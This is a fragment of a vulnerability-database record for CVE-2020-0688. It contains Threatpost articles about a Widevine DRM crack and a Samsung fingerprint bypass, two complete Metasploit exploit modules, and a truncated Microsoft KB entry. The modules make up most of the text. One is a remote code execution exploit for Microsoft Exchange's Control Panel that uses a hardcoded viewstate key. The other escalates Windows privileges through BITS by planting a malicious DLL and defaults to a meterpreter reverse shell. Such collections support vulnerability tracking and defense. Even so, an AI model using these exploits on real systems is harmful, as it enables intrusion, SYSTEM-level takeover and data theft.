These content keys are then used by the CDM to decrypt the content, which the user can then view.\n\nHowever, using a new variant of a piracy method [uncovered by researcher David Buchanan](<https://twitter.com/David3141593/status/1080606827384131590>) in January, the Fidus researchers were able to board the Netflix ship, as it were, and plunder its premium content by plucking the keys out of this process.\n\n## Breaking Widevine L3\n\n\u201cIt was possible to download a raw file of Stranger Things from Netflix and fully remove the content protection enabled; allowing for illegal distribution of the material,\u201d Fidus researchers noted.\n\nIt should be noted that the issue lies with Widevine, and that Netflix is just one of many Widevine users susceptible to such an attack, the researchers said.\n\nFidus team said that they won\u2019t be publishing the PoC code or further details given that the repercussions could be significant. In January, Buchanan was similarly cagey about his own Widevine-cracking, but did say that it was \u201cscarily trivial to pull off,\u201d and that he used the [Side-Channel Marvels](<https://github.com/SideChannelMarvels>) project during \u201ca few evenings of work\u201d to do so.\n\n\u201cTheir Whitebox AES-128 implementation is vulnerable to the well-studied DFA attack, which can be used to recover the original key. Then you can decrypt the MPEG-CENC streams with plain old ffmpeg,\u201d he tweeted at the time, referring to differential fault analysis (DFA), more on which [can be found here](<https://blog.quarkslab.com/differential-fault-analysis-on-white-box-aes-implementations.html>).\n\nHe also said that while Google acknowledged the issue, there\u2019s not much to be done:\n\n> DRM is flawed by design. 
I do not consider this a bug, and it cannot be fixed.\n> \n> \u2014 D\u0430v\u0456d \u0412uc\u04bb\u0430n\u0430n (@David3141593) [January 3, 2019](<https://twitter.com/David3141593/status/1080618940689252352?ref_src=twsrc%5Etfw>)\n\nFidus intimated that it was working on breaking Widevine L1 and L2: \u201cWith Level 3 down, there\u2019s two to go.\u201d These, if cracked, would be a much bigger problem for Widevine and those that rely upon it, opening the door to pirating the higher-value HD content.\n\nThreatpost has reached out to Fidus for more details and will update this post for any new information.\n\nGoogle did not immediately return a request for comment.\n", "modified": "2019-04-30T16:28:34", "published": "2019-04-30T16:28:34", "id": "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "href": "https://threatpost.com/netflix-compromised-widevine-drm-hack/144220/", "type": "threatpost", "title": "Researchers Compromise Netflix Content in Widevine DRM Hack", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-09-30T22:23:40", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "Samsung has reportedly started rolling out a software patch for the Galaxy S10 and Note10, addressing glitches in both phone models that allow the bypass of their built-in fingerprint authentication sensors.\n\nThe fix comes after Samsung admitted last week that anyone [can bypass the Galaxy S10 fingerprint sensor](<https://threatpost.com/galaxy-s10-fingerprint-sensor-thwarted-with-screen-protector-report/149197/>) if a third-party silicone case is enclosing the phone. 
The acknowledgement led to widespread backlash from customers, while several U.K.-based banks have also started blacklisting impacted Samsung devices for their apps, as the issue also allowed users to access various apps on the impacted devices that were using the biometric function for authentication.\n\nAccording to a Wednesday [report by Android Police](<https://www.androidpolice.com/2019/10/23/samsung-will-begin-patching-fingerprint-scanner-security-flaw-within-24-hours/>), Samsung is now rolling out patches to customers, urging them through its customer support app (Samsung Members) to update their phones to the latest software version, which will fix the biometric authentication glitch.\n\n\u201cSamsung is releasing a software patch to fix fingerprint issues on Galaxy Note10, Note10+, S10, S10+, and S10 5G devices,\u201d Samsung said in a [note on Samsung Members](<https://www.androidpolice.com/2019/10/23/samsung-will-begin-patching-fingerprint-scanner-security-flaw-within-24-hours/#ap-lightbox>). \u201cIf you have registered a fingerprint on one of these devices, you will receive a notification with instructions. This update is being sent out gradually, so you may not receive the notification immediately.\u201d\n\nSamsung Galaxy S10 and Note10 users, for their part, are urged to look out for an update notification on their devices called \u201cBiometrics Update.\u201d Once they click on \u201cUpdate,\u201d they will be instructed to delete all previously registered fingerprints from their phone with covers on the phone, and re-register them without a cover applied to the phone.\n\nThe issue first came to light after a woman alleged that a $3 smartphone screen protector allowed unauthorized users to dupe her Samsung Galaxy S10\u2019s fingerprint recognition sensor \u2013 giving access to her phone and banking apps. The U.K. 
woman, Lisa Neilson, told media reports earlier in October that only her fingerprint was registered on her new Galaxy S10. However, after buying a third-party screen protector off eBay, Neilson\u2019s husband was able to unlock her phone using his fingerprint \u2013 even though it wasn\u2019t registered on the device. Worse, the pair found that Neilson\u2019s husband could log into her phone and access various private apps using the fingerprint biometrics security feature.\n\n\u201cThis issue involved ultrasonic fingerprint sensors unlocking devices after recognizing 3-dimensional patterns appearing on certain silicone screen protecting cases as users\u2019 fingerprints,\u201d said Samsung in a [press release last week](<https://news.samsung.com/global/statement-on-fingerprint-recognition-issue>). \u201cTo prevent any further issues, we advise that Galaxy Note10/10+ and S10/S10+/S10 5G users who use such covers to remove the cover, delete all previous fingerprints and newly register their fingerprints.\u201d\n\nOn the heels of this report, several videos popped up of Galaxy S10 users trying the trick out successfully on their own phones (one such video is below).\n\n[NatWest](<https://twitter.com/NatWest_Help/status/1186676299743580161>) and [Royal Bank](<https://twitter.com/RBS_Help/status/1186553506251071493>) are among the banks that removed their apps from the Google Play store for customers with Samsung Galaxy S10 and Note 10 devices: \u201cThis is due to reports that there are security concerns regarding these devices,\u201d according to a Royal Bank tweet. \u201cWe hope to have our app available again shortly once the issue has been resolved.\u201d\n\n> Hi there Martyn. We've removed the app from the Play Store for customers with Samsung S10 devices. This is due to reports that there are security concerns regarding these devices. We hope to have our app available again shortly once the issue has been resolved. 
WL\n> \n> \u2014 Royal Bank (@RBS_Help) [October 22, 2019](<https://twitter.com/RBS_Help/status/1186553506251071493?ref_src=twsrc%5Etfw>)\n\nThe utilization of biometrics on smartphones has been helpful for identity authentication \u2013 but it\u2019s not foolproof.\n\nIn fact, also in October Google [came under fire for its Pixel 4](<https://arstechnica.com/gadgets/2019/10/google-says-a-fix-for-pixel-4-face-unlock-is-months-away/>) facial recognition unlock feature, which users said would unlock for users even if their eyes were closed. Google issued a media statement this weekend that the glitch will be fixed in a software update that will be delivered in the \u201ccoming months.\u201d\n\nOther privacy incidents have plagued smartphone vendors around biometric authentication. [In August](<https://threatpost.com/researchers-bypass-apple-faceid-using-biometrics-achilles-heel/147109/>), researchers revealed vulnerabilities in the authentication process of biometrics technology that could allow bad actors to bypass various facial recognition applications \u2013 including Apple\u2019s FaceID. In 2018, a design flaw affecting all in-display fingerprint sensors \u2013 that left over a half-dozen cellphone models vulnerable to a trivial lock-screen bypass attack \u2013 [was quietly patched](<https://threatpost.com/lock-screen-bypass-bug-quietly-patched-in-handsets/139141/>). The flaw was tied to a bug in the popular in-display fingerprint reader technology used for user authentication. 
New vulnerabilities in [voice authentication](<https://threatpost.com/black-hat-2018-voice-authentication-is-broken-researchers-say/134926/>) have been uncovered as well.\n", "modified": "2019-10-24T15:44:50", "published": "2019-10-24T15:44:50", "id": "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "href": "https://threatpost.com/samsung-fix-galaxy-s10-fingerprint-sensor/149510/", "type": "threatpost", "title": "Samsung Rolls Out Fix For Galaxy S10 Fingerprint Sensor Glitch", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-03-05T07:12:27", "description": "", "published": "2020-03-04T00:00:00", "type": "packetstorm", "title": "Exchange Control Panel Viewstate Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "2020-03-04T00:00:00", "id": "PACKETSTORM:156620", "href": "https://packetstormsecurity.com/files/156620/Exchange-Control-Panel-Viewstate-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'bindata' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# include Msf::Auxiliary::Report \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \nDEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27' \nVALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\" \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exchange Control Panel Viewstate Deserialization', \n'Description' => %q{ \nThis module exploits a .NET serialization vulnerability in the \nExchange Control Panel (ECP) web page. The vulnerability is due to \nMicrosoft Exchange Server not randomizing the keys on a \nper-installation basis resulting in them using the same validationKey \nand decryptionKey values. 
With knowledge of these values, an attacker \ncan craft a special viewstate to cause an OS command to be executed \nby NT_AUTHORITY\\SYSTEM using .NET deserialization. \n}, \n'Author' => 'Spencer McIntyre', \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2020-0688'], \n['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'], \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows (x86)', { 'Arch' => ARCH_X86 } ], \n[ 'Windows (x64)', { 'Arch' => ARCH_X64 } ], \n[ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ] \n], \n'DefaultOptions' => \n{ \n'SSL' => true \n}, \n'DefaultTarget' => 1, \n'DisclosureDate' => '2020-02-11', \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE, ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ], \n'Reliability' => [ REPEATABLE_SESSION, ], \n} \n)) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]), \nOptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]), \n]) \nend \n \ndef check \nstate = get_request_setup \nviewstate = state[:viewstate] \nreturn CheckCode::Unknown if viewstate.nil? 
\n \nviewstate = Rex::Text.decode_base64(viewstate) \nbody = viewstate[0...-20] \nsignature = viewstate[-20..-1] \n \nunless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature \nreturn CheckCode::Safe \nend \n \n# we've validated the signature matches based on the data we have and thus \n# proven that we are capable of signing a viewstate ourselves \nCheckCode::Vulnerable \nend \n \ndef generate_viewstate(generator, session_id, cmd) \nviewstate = ::Msf::Util::DotNetDeserialization.generate(cmd) \nsignature = generate_viewstate_signature(generator, session_id, viewstate) \nRex::Text.encode_base64(viewstate + signature) \nend \n \ndef generate_viewstate_signature(generator, session_id, viewstate) \nmac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>') \nmac_key_bytes << Rex::Text.to_unicode(session_id) \nOpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes) \nend \n \ndef exploit \nstate = get_request_setup \n \n# the major limit is the max length of a GET request, the command will be \n# XML escaped and then base64 encoded which both increase the size \nif target.arch.first == ARCH_CMD \nexecute_command(payload.encoded, opts={state: state}) \nelse \ncmd_target = targets.select { |target| target.arch.include? 
ARCH_CMD }.first \nexecute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state}) \nend \nend \n \ndef execute_command(cmd, opts) \nstate = opts[:state] \nviewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd) \n5.times do |iteration| \n# this request *must* be a GET request, can't use POST to use a larger viewstate \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'), \n'cookie' => state[:cookies].join(''), \n'agent' => state[:user_agent], \n'vars_get' => { \n'__VIEWSTATE' => viewstate, \n'__VIEWSTATEGENERATOR' => state[:viewstate_generator] \n} \n}) \nbreak \nrescue Rex::ConnectionError, Errno::ECONNRESET => e \nvprint_warning('Encountered a connection error while sending the command, sleeping before retrying') \nsleep iteration \nend \nend \n \ndef get_request_setup \n# need to use a newer default user-agent than what Metasploit currently provides \n# see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string \nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43' \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'), \n'method' => 'POST', \n'agent' => user_agent, \n'vars_post' => { \n'password' => datastore['PASSWORD'], \n'flags' => '4', \n'destination' => full_uri(normalize_uri(target_uri.path, 'owa')), \n'username' => datastore['USERNAME'] \n} \n}) \nfail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil? 
\ncookies = [res.get_cookies] \n \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'), \n'cookie' => res.get_cookies, \n'agent' => user_agent \n}) \nfail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200 \ncookies << res.get_cookies \n \nviewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0] \nif viewstate_generator.nil? \nprint_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\") \nviewstate_generator = DEFAULT_VIEWSTATE_GENERATOR \nelse \nvprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\") \nend \n \nviewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0] \nif viewstate.nil? \nvprint_warning('Failed to find the __VIEWSTATE value') \nend \n \nsession_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0] \nif session_id.nil? 
\nfail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies') \nend \nvprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\") \n \n{user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id} \nend \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156620/exchange_ecp_viewstate.rb.txt"}, {"lastseen": "2020-06-12T01:33:20", "description": "", "published": "2020-06-11T00:00:00", "type": "packetstorm", "title": "Background Intelligent Transfer Service Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688", "CVE-2020-0787"], "modified": "2020-06-11T00:00:00", "id": "PACKETSTORM:158056", "href": "https://packetstormsecurity.com/files/158056/Background-Intelligent-Transfer-Service-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::EXE # Needed for generate_payload_dll \ninclude Msf::Post::Windows::FileSystem \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability', \n'Description' => %q{ \nThis module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the \nBackground Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll \nwith a malicious DLL containing the attacker's payload. 
\n \nTo achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which \nwill result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking \nissue within the Update Session Orchestrator Service. \n \nNote that presently this module only works on Windows 10 and Windows Server 2016 and later as the \nUpdate Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested, \nso your mileage may vary on Windows Server 2016 and later. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'itm4n', # PoC \n'gwillcox-r7' # msf module \n], \n'Platform' => ['win'], \n'SessionTypes' => ['meterpreter'], \n'Privileged' => true, \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => \n[ \n[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-03-10', \n'References' => \n[ \n['CVE', '2020-0787'], \n['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'], \n['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'], \n['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'], \n['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'], \n['URL', 'https://itm4n.github.io/usodllloader-part1/'], \n['URL', 'https://itm4n.github.io/usodllloader-part2/'], \n], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ] \n}, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'WfsDelay' => 900 \n} \n) \n) \n \nregister_options([ \nOptBool.new('OVERWRITE_DLL', [true, 'Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).', false]), \nOptInt.new('JOB_WAIT_TIME', [true, 'Time to wait for the BITS job to complete before starting the USO service to execute the 
uploaded payload, in seconds', 20]) \n]) \nend \n \ndef target_not_presently_supported \nprint_warning('This target is not presently supported by this exploit. Support may be added in the future!') \nprint_warning('Attempts to exploit this target with this module WILL NOT WORK!') \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!') \nend \n \n# XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations. \nbuild_num_raw = session.shell_command_token('cmd.exe /c ver') \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/) \nif build_num.nil? \nprint_error(\"Couldn't retrieve the target's build number!\") \nelse \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0] \nprint_status(\"Target's build number: #{build_num}\") \nend \n \n# see https://docs.microsoft.com/en-us/windows/release-information/ \nunless sysinfo_value =~ /(7|8|8\\.1|10|2008|2012|2016|2019|1803|1903)/ \nreturn CheckCode::Safe('Target is not running a vulnerable version of Windows!') \nend \n \nbuild_num_gemversion = Gem::Version.new(build_num) \n \n# Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/ \nif (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.719')) # Windows 10 v1909 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.719')) # Windows 10 v1903 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1098')) # Windows 10 v1809 
\nreturn CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1365')) # Windows 10 v1803 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) && (build_num_gemversion < Gem::Version.new('10.0.16299.1747')) # Windows 10 v1709 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.15063.0')) && (build_num_gemversion < Gem::Version.new('10.0.15063.2313')) # Windows 10 v1703 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3564')) # Windows 10 v1607 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.9999999')) # Windows 10 v1511 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18519')) # Windows 10 v1507 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19665')) # Windows 8.1/Windows Server 2012 R2 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.23009')) # Windows 8/Windows Server 2012 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build
detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24549')) # Windows 7/Windows Server 2008 R2 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.0.6001.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20749')) # Windows Server 2008/Windows Server 2008 SP2 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!') \nelse \nreturn CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!') \nend \nend \n \ndef check_target_is_running_supported_windows_version \nif sysinfo['OS'].match('Windows').nil? \nfail_with(Failure::NotVulnerable, 'Target is not running Windows!') \nelsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil? \nfail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...') \nend \nend \n \ndef check_target_and_payload_match_and_supported(client_arch) \nif (client_arch != ARCH_X64) && (client_arch != ARCH_X86) \nfail_with(Failure::BadConfig, 'This exploit currently only supports x86 and x64 targets!') \nend \npayload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere. \nif (payload_arch != ARCH_X64) && (payload_arch != ARCH_X86) \nfail_with(Failure::BadConfig, \"Unsupported payload architecture (#{payload_arch})\") # Unsupported architecture, so return an error. 
\nend \nif ((client_arch == ARCH_X64) && (payload_arch != ARCH_X64)) || ((client_arch == ARCH_X86) && (payload_arch != ARCH_X86)) \nfail_with(Failure::BadConfig, \"Payload architecture (#{payload_arch}) doesn't match the architecture of the target (#{client_arch})!\") \nend \nend \n \ndef check_windowscoredeviceinfo_dll_exists_on_target \n# Taken from bwatters-r7's cve-2020-0688_service_tracing.rb code. \n# \n# We are going to overwrite the WindowsCoreDeviceInfo.dll DLL as part of our exploit. \n# The second part of this exploit will trigger a Update Session to be created so that this DLL \n# is loaded, which will result in arbitrary code execution as SYSTEM. \n# \n# To prevent any errors, we will first check that this file doesn't exist and ask the user if they are sure \n# that they want to overwrite the file. \nwin_dir = session.sys.config.getenv('windir') \nnormal_target_payload_pathname = \"#{win_dir}\\\\System32\\\\WindowsCoreDeviceInfo.dll\" \nwow64_target_payload_pathname = \"#{win_dir}\\\\Sysnative\\\\WindowsCoreDeviceInfo.dll\" \nwow64_existing_file = \"#{win_dir}\\\\Sysnative\\\\win32k.sys\" \nif file?(wow64_existing_file) \nif file?(wow64_target_payload_pathname) \nprint_warning(\"#{wow64_target_payload_pathname} already exists\") \nprint_warning('If it is in use, the overwrite will fail') \nunless datastore['OVERWRITE_DLL'] \nprint_error('Change OVERWRITE_DLL option to true if you would like to proceed.') \nfail_with(Failure::BadConfig, \"#{wow64_target_payload_pathname} already exists and OVERWRITE_DLL option is false\") \nend \nend \ntarget_payload_pathname = wow64_target_payload_pathname \nelsif file?(normal_target_payload_pathname) \nprint_warning(\"#{normal_target_payload_pathname} already exists\") \nprint_warning('If it is in use, the overwrite will fail') \nunless datastore['OVERWRITE_DLL'] \nprint_error('Change OVERWRITE_DLL option to true if you would like to proceed.') \nfail_with(Failure::BadConfig, \"#{normal_target_payload_pathname} 
already exists and OVERWRITE_DLL option is false\") \nend \ntarget_payload_pathname = normal_target_payload_pathname \nend \ntarget_payload_pathname \nend \n \ndef launch_background_injectable_notepad \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nprocess \nrescue Rex::Post::Meterpreter::RequestError \n# Sandboxes could not allow to create a new process \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nprocess \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \n# Step 1: Check target environment is correct. \nprint_status('Step #1: Checking target environment...') \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \nclient_arch = sysinfo['Architecture'] \ncheck_target_is_running_supported_windows_version \ncheck_target_and_payload_match_and_supported(client_arch) \ncheck_windowscoredeviceinfo_dll_exists_on_target \n \n# Step 2: Generate the malicious DLL and upload it to a temp location. 
\nprint_status('Step #2: Generating the malicious DLL...') \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787') \ndatastore['EXE::Path'] = path \nif client_arch =~ /x86/i \ndatastore['EXE::Template'] = ::File.join(path, 'template_x86_windows.dll') \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x86.dll') \nlibrary_path = ::File.expand_path(library_path) \nelsif client_arch =~ /x64/i \ndatastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll') \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x64.dll') \nlibrary_path = ::File.expand_path(library_path) \nend \n \npayload_dll = generate_payload_dll \nprint_status(\"Payload DLL is #{payload_dll.length} bytes long\") \ntemp_directory = session.sys.config.getenv('%TEMP%') \nmalicious_dll_location = \"#{temp_directory}\\\\\" + Rex::Text.rand_text_alpha(6..13) + '.dll' \nwrite_file(malicious_dll_location, payload_dll) \nregister_file_for_cleanup(malicious_dll_location) \n \n# Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy. \nprint_status('Step #3: Loading the exploit DLL to run the main exploit...') \nprocess = launch_background_injectable_notepad \n \nprint_status(\"Injecting DLL into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \n \ndll_info_parameter = malicious_dll_location.to_s \npayload_mem = inject_into_process(process, dll_info_parameter) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('DLL injected. 
Executing injected DLL...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \n \nprint_status(\"Sleeping for #{datastore['JOB_WAIT_TIME']} seconds to allow the exploit to run...\") \nsleep datastore['JOB_WAIT_TIME'] \n \nregister_file_for_cleanup('C:\\\\Windows\\\\System32\\\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up. \n# Normally we can't delete this file though as there will be a SYSTEM service that has a handle to this file. \n \nprint_status(\"Starting the interactive scan job...\") \n# Step 4: Execute `usoclient StartInteractiveScan` to trigger the payload \n# XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations. \nsession.shell_command_token('usoclient StartInteractiveScan') \n \nprint_status(\"Enjoy the shell!\") \nend \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/158056/cve_2020_0787_bits_arbitrary_file_move.rb.txt"}], "mskb": [{"lastseen": "2021-01-01T22:44:28", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0688"], "description": "<html><body><p>Description of the security update for Microsoft Exchange Server 2010: February 11, 2020</p><h2></h2><p>This update rollup is a security update that provides a security advisory in Microsoft Exchange.\u00a0To learn more about these\u00a0vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):</p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0688\" managed-link=\"\" target=\"_blank\">CVE-2020-0688 | Microsoft Exchange Memory Corruption Vulnerability</a></li></ul><p>This update also fixes the following issue:</p><p class=\"indent-1\"><a data-content-id=\"4540267\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">4540267</a>\u00a0MSExchangeDelivery.exe or EdgeTransport.exe 
